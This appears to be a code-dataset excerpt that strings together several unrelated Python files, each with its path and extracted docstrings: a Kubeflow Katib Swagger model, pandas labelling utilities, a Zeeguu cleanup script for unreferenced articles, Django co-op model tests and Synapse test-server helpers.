@objective.setter
def objective(self, objective):
"""Sets the objective of this V1alpha3ExperimentSpec.
Describes the objective of the experiment. # noqa: E501
:param objective: The objective of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3ObjectiveSpec
"""
self._objective = objective
@property
def parallel_trial_count(self):
"""Gets the parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
How many trials can be processed in parallel. Defaults to 3 # noqa: E501
:return: The parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
"""
return self._parallel_trial_count
@parallel_trial_count.setter
def parallel_trial_count(self, parallel_trial_count):
"""Sets the parallel_trial_count of this V1alpha3ExperimentSpec.
How many trials can be processed in parallel. Defaults to 3 # noqa: E501
:param parallel_trial_count: The parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
"""
self._parallel_trial_count = parallel_trial_count
@property
def parameters(self):
"""Gets the parameters of this V1alpha3ExperimentSpec. # noqa: E501
List of hyperparameter configurations. # noqa: E501
:return: The parameters of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: list[V1alpha3ParameterSpec]
"""
return self._parameters
@parameters.setter
def parameters(self, parameters):
"""Sets the parameters of this V1alpha3ExperimentSpec.
List of hyperparameter configurations. # noqa: E501
:param parameters: The parameters of this V1alpha3ExperimentSpec. # noqa: E501
:type: list[V1alpha3ParameterSpec]
"""
self._parameters = parameters
@property
def resume_policy(self):
"""Gets the resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
Describes resuming policy which usually take effect after experiment terminated. # noqa: E501
:return: The resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: str
"""
return self._resume_policy
@resume_policy.setter
def resume_policy(self, resume_policy):
"""Sets the resume_policy of this V1alpha3ExperimentSpec.
Describes resuming policy which usually take effect after experiment terminated. # noqa: E501
:param resume_policy: The resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
:type: str
"""
self._resume_policy = resume_policy
@property
def trial_template(self):
"""Gets the trial_template of this V1alpha3ExperimentSpec. # noqa: E501
Template for each run of the trial. # noqa: E501
:return: The trial_template of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3TrialTemplate
"""
return self._trial_template
@trial_template.setter
def trial_template(self, trial_template):
"""Sets the trial_template of this V1alpha3ExperimentSpec.
Template for each run of the trial. # noqa: E501
:param trial_template: The trial_template of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3TrialTemplate
"""
self._trial_template = trial_template
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(V1alpha3ExperimentSpec, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha3ExperimentSpec):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
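# --- Illustrative usage sketch (added for clarity; not part of the generated
# code).  The algorithm, objective, parameter and trial-template arguments are
# assumed to be instances of the corresponding generated model classes
# imported at the top of this module.
def _example_experiment_spec(algorithm, objective, parameters, trial_template):
    spec = V1alpha3ExperimentSpec(
        algorithm=algorithm,
        objective=objective,
        parameters=parameters,
        trial_template=trial_template,
        max_trial_count=12,
        parallel_trial_count=3,
        max_failed_trial_count=3,
    )
    # to_dict() produces the plain-dict representation used for serialization.
    return spec.to_dict()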
| sdk/python/v1alpha3/kubeflow/katib/models/v1alpha3_experiment_spec.py | 12,954 | NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Returns true if both objects are equal
V1alpha3ExperimentSpec - a model defined in Swagger
Returns true if both objects are not equal
For `print` and `pprint`
Gets the algorithm of this V1alpha3ExperimentSpec. # noqa: E501
Describes the suggestion algorithm. # noqa: E501
:return: The algorithm of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3AlgorithmSpec
Sets the algorithm of this V1alpha3ExperimentSpec.
Describes the suggestion algorithm. # noqa: E501
:param algorithm: The algorithm of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3AlgorithmSpec
Gets the max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
Max failed trials to mark experiment as failed. # noqa: E501
:return: The max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
Sets the max_failed_trial_count of this V1alpha3ExperimentSpec.
Max failed trials to mark experiment as failed. # noqa: E501
:param max_failed_trial_count: The max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
Gets the max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
Max completed trials to mark experiment as succeeded # noqa: E501
:return: The max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
Sets the max_trial_count of this V1alpha3ExperimentSpec.
Max completed trials to mark experiment as succeeded # noqa: E501
:param max_trial_count: The max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
Gets the metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
For v1alpha3 we will keep the metrics collector implementation same as v1alpha1. # noqa: E501
:return: The metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3MetricsCollectorSpec
Sets the metrics_collector_spec of this V1alpha3ExperimentSpec.
For v1alpha3 we will keep the metrics collector implementation same as v1alpha1. # noqa: E501
:param metrics_collector_spec: The metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3MetricsCollectorSpec
Gets the nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:return: The nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3NasConfig
Sets the nas_config of this V1alpha3ExperimentSpec.
:param nas_config: The nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3NasConfig
Gets the objective of this V1alpha3ExperimentSpec. # noqa: E501
Describes the objective of the experiment. # noqa: E501
:return: The objective of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3ObjectiveSpec
Sets the objective of this V1alpha3ExperimentSpec.
Describes the objective of the experiment. # noqa: E501
:param objective: The objective of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3ObjectiveSpec
Gets the parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
How many trials can be processed in parallel. Defaults to 3 # noqa: E501
:return: The parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
Sets the parallel_trial_count of this V1alpha3ExperimentSpec.
How many trials can be processed in parallel. Defaults to 3 # noqa: E501
:param parallel_trial_count: The parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
Gets the parameters of this V1alpha3ExperimentSpec. # noqa: E501
List of hyperparameter configurations. # noqa: E501
:return: The parameters of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: list[V1alpha3ParameterSpec]
Sets the parameters of this V1alpha3ExperimentSpec.
List of hyperparameter configurations. # noqa: E501
:param parameters: The parameters of this V1alpha3ExperimentSpec. # noqa: E501
:type: list[V1alpha3ParameterSpec]
Gets the resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
Describes resuming policy which usually take effect after experiment terminated. # noqa: E501
:return: The resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: str
Sets the resume_policy of this V1alpha3ExperimentSpec.
Describes resuming policy which usually take effect after experiment terminated. # noqa: E501
:param resume_policy: The resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
:type: str
Returns the model properties as a dict
Returns the string representation of the model
Gets the trial_template of this V1alpha3ExperimentSpec. # noqa: E501
Template for each run of the trial. # noqa: E501
:return: The trial_template of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3TrialTemplate
Sets the trial_template of this V1alpha3ExperimentSpec.
Template for each run of the trial. # noqa: E501
:param trial_template: The trial_template of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3TrialTemplate
Katib
Swagger description for Katib # noqa: E501
OpenAPI spec version: v1alpha3-0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
coding: utf-8 noqa: F401 noqa: F401,E501 noqa: F401,E501 noqa: F401,E501 noqa: F401,E501 noqa: F401,E501 noqa: F401,E501 noqa: E501 noqa: E501 | 5,259 | en | 0.661605 |
## utility functions
## including: labelling, annotation, continuous borders
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
## create labels
def generate_class_label(data):
"""
generates class label on a copy of data using the columns
State, From_X, From_Y, To_X, To_Y
"""
r_data = data.copy()
r_data['target'] = \
r_data.State.astype(np.str) + "_"+ \
r_data.From_X.astype(np.str)+ "," + r_data.From_Y.astype(np.str)+ "_" + \
r_data.To_X.astype(np.str)+ "," + r_data.To_Y.astype(np.str)
return r_data
def generate_class_label_and_drop(data):
"""
    generates class label on a copy of data using the columns
    State, From_X, From_Y, To_X, To_Y, then drops those source columns
    (plus ID and Rng_ID) and removes Pause/Enter/Leave rows
"""
r_data = data.copy()
r_data['target'] = \
r_data.State.astype(np.str) + "_"+ \
r_data.From_X.astype(np.str)+ "," + r_data.From_Y.astype(np.str)+ "_" + \
r_data.To_X.astype(np.str)+ "," + r_data.To_Y.astype(np.str)
r_data = r_data.drop('From_X', 1)
r_data = r_data.drop('From_Y', 1)
r_data = r_data.drop('To_Y', 1)
r_data = r_data.drop('To_X', 1)
r_data = r_data.drop('State', 1)
r_data = r_data.drop('ID', 1)
r_data = r_data.drop('Rng_ID', 1)
r_data = r_data[ ~r_data['target'].str.contains("Pause") ]
r_data = r_data[ ~r_data['target'].str.contains("Enter") ]
r_data = r_data[ ~r_data['target'].str.contains("Leave") ]
return r_data.reset_index()
def generate_class_label_presence(data, state_variable ="target"):
"""
    generates a presence-only class label ('Present' vs 'Not Present') on a copy of data.
    Removes Pause/Enter/Leave rows and merges 'Step', 'Stand' and 'Walk' into 'Present'
"""
r_data = data.copy()
r_data = r_data[ ~r_data['target'].str.contains("Pause") ]
r_data.loc[ r_data['target'].str.contains("Step"), 'target' ] = "Present"
r_data.loc[ r_data['target'].str.contains("Stand"), 'target' ] = "Present"
r_data.loc[ r_data['target'].str.contains("Walk"), 'target' ] = "Present"
# remove enter and leave
r_data = r_data[ ~r_data['target'].str.contains("Enter") ]
r_data = r_data[ ~r_data['target'].str.contains("Leave") ]
r_data.loc[ ~r_data['target'].str.contains("Present"), 'target' ] = "Not Present"
return r_data.reset_index()
def generate_class_label_dyn_vs_empty(data, state_variable ="target"):
"""
    generates a class label for dynamic presence vs. empty on a copy of data.
    Removes Pause/Enter/Stand/Leave rows; maps 'Walk' and 'Step' to 'Present' and 'Empty' to 'Not Present'
"""
r_data = data.copy()
r_data = r_data[ ~r_data['target'].str.contains("Pause") ]
r_data.loc[ r_data['target'].str.contains("Walk"), 'target' ] = "Present"
r_data.loc[ r_data['target'].str.contains("Step"), 'target' ] = "Present"
r_data.loc[ r_data['target'].str.contains("Empty"), 'target' ] = "Not Present"
# remove enter and leave
r_data = r_data[ ~r_data['target'].str.contains("Enter") ]
r_data = r_data[ ~r_data['target'].str.contains("Stand") ]
r_data = r_data[ ~r_data['target'].str.contains("Leave") ]
return r_data.reset_index()
def generate_class_label_presence_and_dynamic(data, state_variable ="State"):
"""
    generates class labels that distinguish presence and dynamics on a copy of data.
    Removes Pause/Enter/Leave rows and normalizes the remaining states to 'Step', 'Walk', 'Stand' and 'Empty'
"""
r_data = data.copy()
r_data['target'] = r_data[state_variable].astype(np.str)
r_data = r_data[ ~r_data['target'].str.contains("Pause") ]
r_data = r_data[ ~r_data['target'].str.contains("Enter") ]
r_data = r_data[ ~r_data['target'].str.contains("Leave") ]
r_data.loc[ r_data['target'].str.contains("Step"), 'target' ] = "Step"
r_data.loc[ r_data['target'].str.contains("Walki"), 'target' ] = "Walk"
r_data.loc[ r_data['target'].str.contains("Stand"), 'target' ] = "Stand"
r_data.loc[ r_data['target'].str.contains("Empty"), 'target' ] = "Empty"
return r_data
def get_contigous_borders(indices):
"""
helper function to derive contiguous borders from a list of indices
Parameters
----------
    indices : all indices at which a certain thing occurs
Returns
-------
    list of [start, end] index pairs for each contiguous group (note: end is the real last element of the group, _not_ end+1)
"""
r =[ [indices[0]] ]
prev = r[0][0]
for ix,i in enumerate(indices):
        # distance between last occurrence and current > 1
# then there is obviously a space
if (i - prev) > 1:
# add end
r[-1].append(indices[ix-1])
# add new start
r.append([ indices[ix] ])
prev = i
r[-1].append( indices[-1] )
return r
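# Illustrative example (added for clarity; not part of the original module):
# for indices [2, 3, 4, 9, 10] the contiguous groups are [[2, 4], [9, 10]],
# i.e. each pair holds the first and last index of one run.
def _example_contigous_borders():
    return get_contigous_borders([2, 3, 4, 9, 10])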
def get_contiguous_activity_borders(data, label):
"""
    returns a dict mapping each value of the `label` column to its list of [start, end] border pairs
"""
labels = data[label].unique()
r = {}
for l in labels:
a = data[data[label] == l].index.values
r[l] = get_contigous_borders(a)
r['length'] = data.shape[0]
return(r)
def annotate(a):
"""
draws annotation into a sns heatmap using plt annotation
    a : dictionary with activity name and borders
"""
min_length = 4
for k in a.keys():
if k == "length":
continue
borders = a[k]
for s,e in borders:
# need to correct for coordinates starting at 0,0
s_r = a['length'] - s
e_r = a['length'] - e
#print(s_r, e_r)
plt.annotate("",
xy=(4, s_r), xycoords='data',
xytext=(4, e_r), textcoords='data',
arrowprops=dict(shrink=0.0, headwidth=10.0, headlength=1.0, width=0.25, shrinkA=0.0, shrinkB=0.0 )
#arrowprops=dict(arrowstyle="|-|",
# connectionstyle="arc3"),
)
# only write text if enough space available
if s_r - e_r < min_length:
continue
plt.annotate(k,
xy=(7, s_r-((s_r-e_r)//2)-min_length//2), xycoords='data',
xytext=(7, s_r-((s_r-e_r)//2)-min_length//2), textcoords='data',
size=9
)
def get_trx_groups(data, group_key="_ifft_0"):
lst = data.columns[data.columns.str.contains(group_key)]
groups = [ [x[:-2]] for x in lst]
return groups | notebooks/pawel_ueb2/utility.py | 6,794 | draws annotation into a sns heatmap using plt annotation
    a : dictionary with activity name and borders
generates class label on a copy of data using the columns
State, From_X, From_Y, To_X, To_Y
generates class label on a copy of data using the columns
State, From_X, From_Y, To_X, To_Y
generates class label only for presence on a copy of data using only the columns
Removes: Pause and merges 'Step' and 'Stand' to same class
generates class label only for presence on a copy of data using only the columns
Removes: Pause and merges 'Step' and 'Stand' to same class
generates class label only for presence on a copy of data using only the columns
Removes: Pause and merges 'Step' and 'Stand' to same class
helper function to derive contiguous borders from a list of indices
Parameters
----------
    indices : all indices at which a certain thing occurs
Returns
-------
list of groups when the indices starts and ends (note: last element is the real last element of the group _not_ n+1)
returns a dict with all starts ends of all labels provided in label variable
utility functions including: labelling, annotation, continuous borders create labels remove enter and leave remove enter and leave distance bw last occurence and current > 1 then there is obviously a space add end add new start need to correct for coordinates starting at 0,0print(s_r, e_r)arrowprops=dict(arrowstyle="|-|", connectionstyle="arc3"), only write text if enough space available | 1,472 | en | 0.663768 |
# Script:
#
# remove all articles from the DB which have no
# references to them and are older than a number of days
#
# works with the db that is defined in the configuration
# pointed by ZEEGUU_CORE_CONFIG
#
# takes as argument the number of days before which the
# articles will be deleted.
#
# call like this to remove all articles older than 90 days
#
#
# python remove_unreferenced_articles.py 90
#
#
#
from zeeguu_core.model import Article, UserArticle, UserActivityData
from zeeguu_core import db
dbs = db.session
import sys
try:
DAYS = int(sys.argv[1])
except:
print ("\nOOOPS: you must provide a number of days before which the articles to be deleted\n")
exit(-1)
deleted = []
print("1. finding urls in activity data...")
all_urls = set()
all_activity_data = UserActivityData.query.all()
for each in all_activity_data:
url = each.find_url_in_extra_data()
if url:
all_urls.add(url)
print(f" ... url count: {len(all_urls)}")
#
print(f"2. finding articles older than {DAYS} days...")
all_articles = Article.all_older_than(days=DAYS)
print(f" ... article count: {len(all_articles)}")
i = 0
for each in all_articles:
i += 1
info = UserArticle.find_by_article(each)
url_found = each.url.as_string() in all_urls
if info or url_found:
if info:
print(f"WON'T DELETE info! {each.id} {each.title}")
for ainfo in info:
print(ainfo.user_info_as_string())
if url_found:
print(f"WON'T DELETE url_found! {each.id} {each.title}")
else:
deleted.append(each.id)
dbs.delete(each)
if i == 1000:
dbs.commit()
i = 0
dbs.commit()
print(f'Deleted: {deleted}')
| tools/remove_unreferenced_articles.py | 1,716 | Script: remove all articles from the DB which have no references to them and are older than a number of days works with the db that is defined in the configuration pointed by ZEEGUU_CORE_CONFIG takes as argument the number of days before which the articles will be deleted. call like this to remove all articles older than 90 days python remove_unreferenced_articles.py 90 | 377 | en | 0.918489 |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of the confirmation_aw3 skill."""
from aea.configurations.base import PublicId
PUBLIC_ID = PublicId.from_str("fetchai/confirmation_aw3:0.3.0")
| packages/fetchai/skills/confirmation_aw3/__init__.py | 985 | This module contains the implementation of the confirmation_aw3 skill.
-*- coding: utf-8 -*- ------------------------------------------------------------------------------ Copyright 2018-2019 Fetch.AI Limited Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ------------------------------------------------------------------------------ | 831 | en | 0.732108 |
import pytest
from django.test import TestCase
from .factories import CoopTypeFactory, CoopFactory, AddressFactory, PhoneContactMethodFactory
from directory.models import Coop, CoopType
class ModelTests(TestCase):
@classmethod
def setUpTestData(cls):
print("setUpTestData: Run once to set up non-modified data for all class methods.")
#management.call_command('loaddata', 'test_data.yaml', verbosity=0)
pass
@pytest.mark.django_db
def test_phone_create(self):
""" Test phone contact method """ # create phone instance
phone_num = "7739441467"
phone = PhoneContactMethodFactory.create(phone=phone_num)
assert phone_num == phone.phone
assert phone.id is not None
@pytest.mark.django_db
def test_phone_create_invalid_num(self):
""" Test phone contact method """ # create phone instance
phone_num = "abcdefsfdsf"
phone = PhoneContactMethodFactory.create(phone=phone_num)
assert phone_num == phone.phone
assert phone.id is not None
print("\n\n\n\n-------------id is ", id)
@pytest.mark.django_db
def test_coop_type_create(self):
""" Test coop type model """ # create customer model instance
coop_type = CoopTypeFactory(name="Test Coop Type Name")
assert coop_type.name == "Test Coop Type Name"
@pytest.mark.django_db
def test_address_create(self):
""" Test address model """ # create customer model instance
address = AddressFactory()
assert address is not None
@pytest.mark.django_db
def test_coop_create(self):
""" Test customer model """ # create customer model instance
coop_from_factory = CoopFactory()
self.assertIsNotNone(coop_from_factory)
coop = Coop.objects.create(name='test')
coop.addresses.set(coop_from_factory.addresses.all())
self.assertIsNotNone(coop)
@pytest.mark.django_db
def test_coop_create_with_existing_type(self):
""" Test customer model """ # create customer model instance
coop_from_factory = CoopFactory()
self.assertIsNotNone(coop_from_factory)
coop_types = coop_from_factory.types
coop = CoopFactory.create(types=[coop_types.all().first()], addresses=coop_from_factory.addresses.all())
self.assertIsNotNone(coop)
@pytest.mark.django_db
def test_coop_create_with_no_types(self):
""" Test customer model """ # create customer model instance
print("\n\n\n\n**********-------- starting test ....\n")
coop = CoopFactory.build(types=[])
print("phone:",coop.phone.phone)
print("email:",coop.email.email)
coop.full_clean()
self.assertIsNotNone(coop)
self.assertIsNone( coop.id )
def test_search_coops_wo_coords(self):
"""
Look for coops with addresses without latitude/longitude coords
"""
address = AddressFactory(latitude=None, longitude=None)
coop_from_factory = CoopFactory(addresses=[address])
# Verify coop appears when we search for those without a lat/lon
coops = Coop.objects.find_wo_coords()
results = list(coops)
assert len(results) > 0, "Failed to find any matching results."
assert coop_from_factory in list(coops), "Failed to find coop."
| web/tests/test_models.py | 3,380 | Test address model
Test customer model
Test customer model
Test customer model
Test coop type model
Test phone contact method
Test phone contact method
Look for coops with addresses without latitude/longitude coords
management.call_command('loaddata', 'test_data.yaml', verbosity=0) create phone instance create phone instance create customer model instance create customer model instance create customer model instance create customer model instance create customer model instance Verify coop appears when we search for those without a lat/lon | 552 | en | 0.664679 |
import json
from io import BytesIO
from six import text_type
import attr
from zope.interface import implementer
from twisted.internet import address, threads, udp
from twisted.internet._resolver import HostResolution
from twisted.internet.address import IPv4Address
from twisted.internet.defer import Deferred
from twisted.internet.error import DNSLookupError
from twisted.internet.interfaces import IReactorPluggableNameResolver
from twisted.python.failure import Failure
from twisted.test.proto_helpers import MemoryReactorClock
from synapse.http.site import SynapseRequest
from synapse.util import Clock
from tests.utils import setup_test_homeserver as _sth
class TimedOutException(Exception):
"""
A web query timed out.
"""
@attr.s
class FakeChannel(object):
"""
A fake Twisted Web Channel (the part that interfaces with the
wire).
"""
_reactor = attr.ib()
result = attr.ib(default=attr.Factory(dict))
_producer = None
@property
def json_body(self):
if not self.result:
raise Exception("No result yet.")
return json.loads(self.result["body"].decode('utf8'))
@property
def code(self):
if not self.result:
raise Exception("No result yet.")
return int(self.result["code"])
def writeHeaders(self, version, code, reason, headers):
self.result["version"] = version
self.result["code"] = code
self.result["reason"] = reason
self.result["headers"] = headers
def write(self, content):
assert isinstance(content, bytes), "Should be bytes! " + repr(content)
if "body" not in self.result:
self.result["body"] = b""
self.result["body"] += content
def registerProducer(self, producer, streaming):
self._producer = producer
self.producerStreaming = streaming
def _produce():
if self._producer:
self._producer.resumeProducing()
self._reactor.callLater(0.1, _produce)
if not streaming:
self._reactor.callLater(0.0, _produce)
def unregisterProducer(self):
if self._producer is None:
return
self._producer = None
def requestDone(self, _self):
self.result["done"] = True
def getPeer(self):
# We give an address so that getClientIP returns a non null entry,
# causing us to record the MAU
return address.IPv4Address("TCP", "127.0.0.1", 3423)
def getHost(self):
return None
@property
def transport(self):
return self
class FakeSite:
"""
A fake Twisted Web Site, with mocks of the extra things that
Synapse adds.
"""
server_version_string = b"1"
site_tag = "test"
@property
def access_logger(self):
class FakeLogger:
def info(self, *args, **kwargs):
pass
return FakeLogger()
def make_request(
reactor,
method,
path,
content=b"",
access_token=None,
request=SynapseRequest,
shorthand=True,
):
"""
Make a web request using the given method and path, feed it the
content, and return the Request and the Channel underneath.
Args:
method (bytes/unicode): The HTTP request method ("verb").
path (bytes/unicode): The HTTP path, suitably URL encoded (e.g.
escaped UTF-8 & spaces and such).
content (bytes or dict): The body of the request. JSON-encoded, if
a dict.
shorthand: Whether to try and be helpful and prefix the given URL
with the usual REST API path, if it doesn't contain it.
Returns:
A synapse.http.site.SynapseRequest.
"""
if not isinstance(method, bytes):
method = method.encode('ascii')
if not isinstance(path, bytes):
path = path.encode('ascii')
# Decorate it to be the full path, if we're using shorthand
if shorthand and not path.startswith(b"/_matrix"):
path = b"/_matrix/client/r0/" + path
path = path.replace(b"//", b"/")
if isinstance(content, text_type):
content = content.encode('utf8')
site = FakeSite()
channel = FakeChannel(reactor)
req = request(site, channel)
req.process = lambda: b""
req.content = BytesIO(content)
if access_token:
req.requestHeaders.addRawHeader(
b"Authorization", b"Bearer " + access_token.encode('ascii')
)
if content:
req.requestHeaders.addRawHeader(b"Content-Type", b"application/json")
req.requestReceived(method, path, b"1.1")
return req, channel
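# --- Illustrative sketch (added; not part of the original helpers) of the
# typical make_request/render call pattern.  `resource` is assumed to be a
# twisted.web Resource under test; the path and token are made up.
def _example_make_request(resource):
    reactor, clock = get_clock()
    request, channel = make_request(
        reactor,
        "GET",
        "/_matrix/client/r0/account/whoami",
        access_token="hypothetical_token",
    )
    render(request, resource, reactor)
    return channel.code, channel.json_body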
def wait_until_result(clock, request, timeout=100):
"""
Wait until the request is finished.
"""
clock.run()
x = 0
while not request.finished:
# If there's a producer, tell it to resume producing so we get content
if request._channel._producer:
request._channel._producer.resumeProducing()
x += 1
if x > timeout:
raise TimedOutException("Timed out waiting for request to finish.")
clock.advance(0.1)
def render(request, resource, clock):
request.render(resource)
wait_until_result(clock, request)
@implementer(IReactorPluggableNameResolver)
class ThreadedMemoryReactorClock(MemoryReactorClock):
"""
A MemoryReactorClock that supports callFromThread.
"""
def __init__(self):
self._udp = []
self.lookups = {}
class Resolver(object):
def resolveHostName(
_self,
resolutionReceiver,
hostName,
portNumber=0,
addressTypes=None,
transportSemantics='TCP',
):
resolution = HostResolution(hostName)
resolutionReceiver.resolutionBegan(resolution)
if hostName not in self.lookups:
raise DNSLookupError("OH NO")
resolutionReceiver.addressResolved(
IPv4Address('TCP', self.lookups[hostName], portNumber)
)
resolutionReceiver.resolutionComplete()
return resolution
self.nameResolver = Resolver()
super(ThreadedMemoryReactorClock, self).__init__()
def listenUDP(self, port, protocol, interface='', maxPacketSize=8196):
p = udp.Port(port, protocol, interface, maxPacketSize, self)
p.startListening()
self._udp.append(p)
return p
def callFromThread(self, callback, *args, **kwargs):
"""
Make the callback fire in the next reactor iteration.
"""
d = Deferred()
d.addCallback(lambda x: callback(*args, **kwargs))
self.callLater(0, d.callback, True)
return d
def setup_test_homeserver(cleanup_func, *args, **kwargs):
"""
Set up a synchronous test server, driven by the reactor used by
the homeserver.
"""
d = _sth(cleanup_func, *args, **kwargs).result
if isinstance(d, Failure):
d.raiseException()
# Make the thread pool synchronous.
clock = d.get_clock()
pool = d.get_db_pool()
def runWithConnection(func, *args, **kwargs):
return threads.deferToThreadPool(
pool._reactor,
pool.threadpool,
pool._runWithConnection,
func,
*args,
**kwargs
)
def runInteraction(interaction, *args, **kwargs):
return threads.deferToThreadPool(
pool._reactor,
pool.threadpool,
pool._runInteraction,
interaction,
*args,
**kwargs
)
pool.runWithConnection = runWithConnection
pool.runInteraction = runInteraction
class ThreadPool:
"""
Threadless thread pool.
"""
def start(self):
pass
def stop(self):
pass
def callInThreadWithCallback(self, onResult, function, *args, **kwargs):
def _(res):
if isinstance(res, Failure):
onResult(False, res)
else:
onResult(True, res)
d = Deferred()
d.addCallback(lambda x: function(*args, **kwargs))
d.addBoth(_)
clock._reactor.callLater(0, d.callback, True)
return d
clock.threadpool = ThreadPool()
pool.threadpool = ThreadPool()
pool.running = True
return d
def get_clock():
clock = ThreadedMemoryReactorClock()
hs_clock = Clock(clock)
return (clock, hs_clock)
@attr.s
class FakeTransport(object):
"""
A twisted.internet.interfaces.ITransport implementation which sends all its data
straight into an IProtocol object: it exists to connect two IProtocols together.
To use it, instantiate it with the receiving IProtocol, and then pass it to the
sending IProtocol's makeConnection method:
server = HTTPChannel()
client.makeConnection(FakeTransport(server, self.reactor))
If you want bidirectional communication, you'll need two instances.
"""
other = attr.ib()
"""The Protocol object which will receive any data written to this transport.
:type: twisted.internet.interfaces.IProtocol
"""
_reactor = attr.ib()
"""Test reactor
:type: twisted.internet.interfaces.IReactorTime
"""
disconnecting = False
buffer = attr.ib(default=b'')
producer = attr.ib(default=None)
def getPeer(self):
return None
def getHost(self):
return None
def loseConnection(self):
self.disconnecting = True
def abortConnection(self):
self.disconnecting = True
def pauseProducing(self):
self.producer.pauseProducing()
def unregisterProducer(self):
if not self.producer:
return
self.producer = None
def registerProducer(self, producer, streaming):
self.producer = producer
self.producerStreaming = streaming
def _produce():
d = self.producer.resumeProducing()
d.addCallback(lambda x: self._reactor.callLater(0.1, _produce))
if not streaming:
self._reactor.callLater(0.0, _produce)
def write(self, byt):
self.buffer = self.buffer + byt
def _write():
if getattr(self.other, "transport") is not None:
self.other.dataReceived(self.buffer)
self.buffer = b""
return
self._reactor.callLater(0.0, _write)
_write()
def writeSequence(self, seq):
for x in seq:
self.write(x)
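# Usage sketch (the client protocol below is a placeholder, not part of this
# module): as the class docstring notes, bidirectional traffic needs a pair of
# FakeTransport instances, one wrapping each end.
#
#     reactor = ThreadedMemoryReactorClock()
#     server = HTTPChannel()
#     client = SomeClientProtocol()
#     client.makeConnection(FakeTransport(server, reactor))
#     server.makeConnection(FakeTransport(client, reactor))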
| tests/server.py | 10,677 | A fake Twisted Web Channel (the part that interfaces with the
wire).
A fake Twisted Web Site, with mocks of the extra things that
Synapse adds.
A twisted.internet.interfaces.ITransport implementation which sends all its data
straight into an IProtocol object: it exists to connect two IProtocols together.
To use it, instantiate it with the receiving IProtocol, and then pass it to the
sending IProtocol's makeConnection method:
server = HTTPChannel()
client.makeConnection(FakeTransport(server, self.reactor))
If you want bidirectional communication, you'll need two instances.
Threadless thread pool.
A MemoryReactorClock that supports callFromThread.
A web query timed out.
Make the callback fire in the next reactor iteration.
Make a web request using the given method and path, feed it the
content, and return the Request and the Channel underneath.
Args:
method (bytes/unicode): The HTTP request method ("verb").
path (bytes/unicode): The HTTP path, suitably URL encoded (e.g.
escaped UTF-8 & spaces and such).
content (bytes or dict): The body of the request. JSON-encoded, if
a dict.
shorthand: Whether to try and be helpful and prefix the given URL
with the usual REST API path, if it doesn't contain it.
Returns:
A synapse.http.site.SynapseRequest.
Set up a synchronous test server, driven by the reactor used by
the homeserver.
Wait until the request is finished.
